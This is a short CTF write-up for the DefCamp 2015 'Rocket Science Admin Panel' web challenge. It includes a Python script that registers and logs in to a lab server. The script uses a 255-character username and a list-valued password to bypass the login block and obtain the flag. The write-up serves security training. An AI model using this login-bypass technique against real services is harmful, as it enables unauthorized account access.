WRITEUP – DEFCAMP2015 – Rocket Science Admin Panel – Web 300

In this challenge we are given a registration page and a login page. After registering, we tried to log in, but we were automatically blocked. We wrote a Python script to register and authenticate automatically. The last step we took was to send a huge number of characters to the server. Registration and login failed, and we got the register and login mask as a response. 1024 characters led to a successful registration, but we got a “nop” as the response when logging in to the service. When we sent 255 a’s, we got a successful login and the flag was given.

#!/usr/bin/python3

import urllib.request
import urllib.parse

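# Base URL of the challenge service
href = 'http://10.13.37.4/'
params = {}

# A list value: urlencode() without doseq=True sends it as the string "['hey', 'you']"
password = ["hey", "you"]

# Register with a username of exactly 255 'a' characters
params['username'] = b'a'*255
params['password'] = password
data = urllib.parse.urlencode(params)
data = data.encode('ascii')
req = urllib.request.Request(href+"register.php", data)
print(urllib.request.urlopen(req).read())

# Log in with the same username and password; the response contains the flag
params['password'] = password
data = urllib.parse.urlencode(params)
data = data.encode('ascii')
req = urllib.request.Request(href+"login.php", data)
print(urllib.request.urlopen(req).read())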